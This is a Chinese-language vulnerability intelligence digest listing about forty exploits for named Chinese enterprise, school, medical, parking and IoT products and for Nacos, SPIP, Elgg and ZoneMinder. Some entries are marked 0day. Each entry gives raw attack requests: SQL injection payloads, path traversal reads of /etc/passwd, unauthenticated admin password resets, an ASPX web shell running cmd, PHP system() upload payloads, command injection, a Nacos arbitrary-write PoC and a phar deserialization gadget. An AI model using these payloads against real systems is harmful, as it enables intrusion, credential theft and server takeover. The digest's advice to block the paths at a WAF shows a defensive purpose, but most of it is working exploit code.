{"appId":"hkmp","data":{"adminUserCode":"test1234","adminUserName":"test1234","appName":"悟空POS Win版' AND (SELECt 5 from (select(sleep(2)))x) and 'zz'='zz","configGroup":"1","mchId":"0001"},"deviceId":"hkmp","mchId":"hkmp","nonce":3621722933,"sign":"hkmp","timestamp":1719306504}
三一谦成
杭州三一谦成科技 车辆监控服务平台SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/gps-web/platformSql |
WAF封禁路路径,等待发布补丁 |
0813 |
0day |
漏洞详情
POST /gps-web/platformSql HTTP/1.1
Host:
action=EXEC_SQL¶ms=SELECT schema_name FROM
information_schema.schemata
安校易
智慧校园(安校易)管理系统FileUpAd.aspx存在文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/Module/FileUpPage/FileUpAd.aspx |
WAF封禁路路径,等待发布补丁 |
0814 |
1day |
漏洞详情
POST /Module/FileUpPage/FileUpAd.aspx?file_tmid=upload HTTP/1.1
------21909179191068471382830692394
<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
------21909179191068471382830692394--
汇思
汇思科技wizBank存在远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/servlet/Dispatcher?isExcludes=true |
WAF封禁路路径,等待发布补丁 |
0816 |
0day |
利用路径
未知
AVCON
AVCON-系统管理平台download.action存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/download.action |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
GET /download.action?filename=../../../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/avcon/av_user/editusercommit.php |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
POST /avcon/av_user/editusercommit.php?currentpage=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=4
userid=admin&username=administration&password=admin&rpassword=admin&question=admin&answer=123&gender=%E7%94%B7&birthday=0000-00-00&edutypeid=0&phone=&mobile=&email=&address=&postcode=&go=-2&confirm=+++%E7%A1%AE%E5%AE%9A+++
WookTeam
WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/api/users/searchinfo |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cuser%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
ZoneMinder
ZoneMinder系统sort接口存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/zm/index.php |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request
/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
东华
东华医疗协同办公系统templateFile存在任意文件下载漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件下载 |
未知 |
/common/templateFile |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
GET /common/templateFile?template_name=../../WEB-INF/web.xml HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
方正
方正全媒体采编系统存在syn.do信息泄露漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/newsedit/assess/syn.do |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
GET /newsedit/assess/syn.do?type=org HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Length: 185Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
智互联
智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/adpweb/static/%2e%2e;/a/sys/runtimeLog/download |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
GET /adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=c:\\windows\win.ini HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
云盟智慧
智能停车管理系统ToLogin存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/Login/ToLogin |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
POST /Login/ToLogin HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Admins_Account=1' AND (SELECT 8104 FROM (SELECT(SLEEP(5)))dEPM) AND 'JYpL'='JYpL&Admins_Pwd=
智能停车管理系统GetPasswayData存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/LaneMonitor/GetPasswayData |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
POST /LaneMonitor/GetPasswayData HTTP/1.1
SentryHost_No=1';SELECT+SLEEP(5)#
Elgg
Elgg 5.1.4 Sql注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
5.1.4 |
/members |
WAF封禁路路径,等待发布补丁 |
0823 |
nday |
漏洞详情
GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
Altenergy
Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/index.php/management/set_timezone |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
POST /index.php/management/set_timezone HTTP/1.1
timezone=`id > rce.txt`
JieLink
JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞poc1
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/report/ParkChargeRecord/GetDataList |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
POST /report/ParkChargeRecord/GetDataList HTTP/1.1
Host:
page=1&rows=20000
JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞poc2
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/Report/ParkCommon/GetParkInThroughDeivces |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
GET /Report/ParkCommon/GetParkInThroughDeivces HTTP/1.1
Host:
Origin:
Referer:
JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞poc3
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/report/ParkOutRecord/GetDataList |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
GET /report/ParkOutRecord/GetDataList HTTP/1.1
Host:
Origin:
Referer:
LiveGBS
LiveGBS任意用户密码重置漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/api/v1/user/list |
|
|
|
| /api/v1/user/resetpassword |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
|
|
漏洞详情
获取用户id
/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc
通过id重置密码
/api/v1/user/resetpassword?id=22&password=123456
华夏
华夏ERPV3.3存在信息泄漏漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
V3.3 |
/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList |
WAF封禁路路径,等待发布补丁 |
0823 |
nday |
漏洞详情
GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1
奥威亚
奥威亚云视频平台UploadFile.aspx存在文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/Services/WeikeCutOut/UploadFile.aspx |
WAF封禁路路径,等待发布补丁 |
0823 |
0day |
漏洞详情
POST /Services/WeikeCutOut/UploadFile.aspx?VideoGuid=/../../ HTTP/1.1
------sajhdjqwjejqwbejhqwbjebqwhje
1111
------sajhdjqwjejqwbejhqwbjebqwhje-
微商城
微商城系统api.php存在文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/api/api.php |
WAF封禁路路径,等待发布补丁 |
0823 |
nday |
漏洞详情
POST /api/api.php?mod=upload&type=1 HTTP/1.1
------WebKitFormBoundaryaKljzbg49Mq4ggLz
<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryaKljzbg49Mq4ggLz--
微商城系统goods.php存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/goods.php |
WAF封禁路路径,等待发布补丁 |
0823 |
nday |
漏洞详情
GET /goods.php?id='+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(IFNULL(CAST(MD5(1)+AS+NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
艾兰得
某业务管理系统LoginUser存在信息泄露漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/Login/LoginUser |
WAF封禁路路径,等待发布补丁 |
0823 |
nday |
漏洞详情
POST /Login/LoginUser HTTP/1.1
{"RecordID":"admin","password":"11111","undefined":"登录","language":"zh-CN"}
正方
正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/zftal-mobile/oaMobile/oaMobile_fjUploadByType.html |
WAF封禁路路径,等待发布补丁 |
0823 |
nday |
漏洞详情
POST /zftal-mobile/oaMobile/oaMobile_fjUploadByType.html HTTP/1.1
------WebKitFormBoundary7MA4YWxkTrZu0gW
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
456
------WebKitFormBoundary7MA4YWxkTrZu0gW
789
------WebKitFormBoundary7MA4YWxkTrZu0gW
111
------WebKitFormBoundary7MA4YWxkTrZu0gW--
物聯網研究中心
私有云管理平台存在登录绕过漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/admin/#/login |
WAF封禁路路径,等待发布补丁 |
0823 |
nday |
漏洞详情
登陆界面抓包改返回响应的数据
{"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="}
汇智
汇智企业资源管理系统存在文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/nssys/common/Upload.aspx |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
POST /nssys/common/Upload.aspx?Action=DNPageAjaxPostBack HTTP/1.1
------WebKitFormBoundaryLkkAXATqVKBHZ8zk
/wEPDwUJOTc0NzkxMzQ1D2QWAgIDDxYGHhdJc0JlZm9yZU9wZXJhdGVTYXZlRGF0YWgeBmlzZ3VpZAUBMR4OY2hlY2tmb3Jtc3RhdGUFATBkZHwobq1hNj9MTgjOtrIn/0gbCdhD
------WebKitFormBoundaryLkkAXATqVKBHZ8zk
573D6CFB
------WebKitFormBoundaryLkkAXATqVKBHZ8zk
------WebKitFormBoundaryLkkAXATqVKBHZ8zk
<!DOCTYPE html>
<html>
<head>
<title>ASP.NET Web Forms Example</title>
</head>
<body>
<%@ Page Language="C#" %>
<% Response.Write("hello,world"); %>
</body>
</html>
------WebKitFormBoundaryLkkAXATqVKBHZ8zk
2.aspx
------WebKitFormBoundaryLkkAXATqVKBHZ8zk
uploadfile
------WebKitFormBoundaryLkkAXATqVKBHZ8zk--
星源图
南京星源图科技SparkShop存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/api/Common/uploadFile |
WAF封禁路路径,等待发布补丁 |
0826 |
nday |
漏洞详情
POST /api/Common/uploadFile HTTP/2
------WebKitFormBoundaryj7OlOPiiukkdktZR
<?php echo"hello world";?>
------WebKitFormBoundaryj7OlOPiiukkdktZR--
点企来
点企来客服系统getwaitnum存在sql注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/admin/event/getwaitnum |
WAF封禁路路径,等待发布补丁 |
0826 |
1day |
漏洞详情
POST /admin/event/getwaitnum HTTP/2
business_id[]=exp&business_id[]=+and+updatexml(1,concat(0x7e,md5(0x5c)),1)&groupid=1
VvvebJs
VvvebJs < 1.7.5 Arbitrary File Upload - RCE (CVE-2024-29272)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/save.php |
WAF封禁路路径,等待发布补丁 |
0828 |
1day |
漏洞详情
info:
Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php.
reference:
- https://github.com/awjkjflkwlekfdjs/CVE-2024-29272/
- https://github.com/givanz/VvvebJs/issues/343
- https://nvd.nist.gov/vuln/detail/CVE-2024-29272
- https://vuldb.com/?id.257680
classification:
metadata:
variables:
http:
- raw:
- |
POST /save.php HTTP/1.1
file=demo/landing/index.php&html={{md5(num)}}
matchers:
- type: dsl
dsl:
- 'contains(body,"File saved")'
- 'status_code == 200'
- raw:
- |
GET /demo/landing/index.php HTTP/1.1
matchers:
- type: dsl
dsl:
- 'contains(body,"{{md5(num)}}")'
- 'status_code == 200'
Nacos
Nacos任意文件读写漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
<=2.4.0.1 |
Jraft服务 |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
public static void send(String addr, byte[] payload) throws Exception {
Configuration conf = new Configuration();
conf.parse(addr);
RouteTable.getInstance().updateConfiguration("nacos", conf);
CliClientServiceImpl cliClientService = new CliClientServiceImpl();
cliClientService.init(new CliOptions());
RouteTable.getInstance().refreshLeader(cliClientService, "nacos", 1000).isOk();
PeerId leader = PeerId.parsePeer(addr);
Field parserClasses = cliClientService.getRpcClient().getClass().getDeclaredField("parserClasses");
parserClasses.setAccessible(true);
ConcurrentHashMap map = (ConcurrentHashMap) parserClasses.get(cliClientService.getRpcClient());
map.put("com.alibaba.nacos.consistency.entity.WriteRequest", WriteRequest.getDefaultInstance());
MarshallerHelper.registerRespInstance(WriteRequest.class.getName(), WriteRequest.getDefaultInstance());
final WriteRequest writeRequest = WriteRequest.newBuilder().setGroup("naming_persistent_service").setData(ByteString.copyFrom(payload)).setOperation("Write").build();
Object o = cliClientService.getRpcClient().invokeSync(leader.getEndpoint(), writeRequest, 5000);
System.out.println(o);
}
public static void main(String[] args) throws Exception {
String address = "192.168.3.153:7848";
BatchWriteRequest request = new BatchWriteRequest();
request.append("1.txt".getBytes(), "aaaa\n".getBytes());//向/home/nacos/data/naming/data/1.txt写入aaaa
JacksonSerializer serializer = new JacksonSerializer();
send(address, serializer.serialize(request));
}
SPIP
SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/index.php |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
POST /index.php?action=porte_plume_previsu HTTP/1.1
data=AA_%5B%3Cimg111111%3E-%3EURL%60%3C%3Fphp+system%28%22whoami%22%29%3B%3F%3E%60%5D_BB
全程云
全程云OA接口UploadFile存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/OA/api/2.0/Common/AttachFile/UploadFile |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
POST /OA/api/2.0/Common/AttachFile/UploadFile HTTP/1.1
------WebKitFormBoundaryNe8DcVuv1vEUWDaR
<% response.write("hello,world") %>
------WebKitFormBoundaryNe8DcVuv1vEUWDaR--
CAGI
某U挖矿质押单语言系统imageupload后台任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/admin/news/imageupload |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
POST /admin/news/imageupload HTTP/1.1
------WebKitFormBoundary03rNBzFMIytvpWhy
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
某U挖矿质押单语言系统前台未授权修改管理员密码
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/admin/login/setpassword |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
/admin/login/setpassword
某U挖矿质押单语言系统后台phar反序列漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
./phpggc -pj 123.jpg -o evil.jpg ThinkPHP/RCE2 system whoami |
|
|
|
| /admin/cache/deldir?backup_file=phar://图片地址 |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
|
|
漏洞详情
./phpggc -pj 123.jpg -o evil.jpg ThinkPHP/RCE2 system whoami
/admin/cache/deldir?backup_file=phar://图片地址
朗新天霁
朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/api/Com/GetE01ByDeptCode |
WAF封禁路路径,等待发布补丁 |
0829 |
1day |
漏洞详情
POST /api/Com/GetE01ByDeptCode HTTP/1.1
{"deptCode":"1') AND 8104=8104 AND ('UCOF'='UCOF"}
蜂信物联
蜂信物联(FastBee) 物联网平台 任意文件下载漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件下载 |
未知 |
/prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd |
WAF封禁路路径,等待发布补丁 |
0830 |
nday |
漏洞详情
GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd
HTTP/1.1
Host:
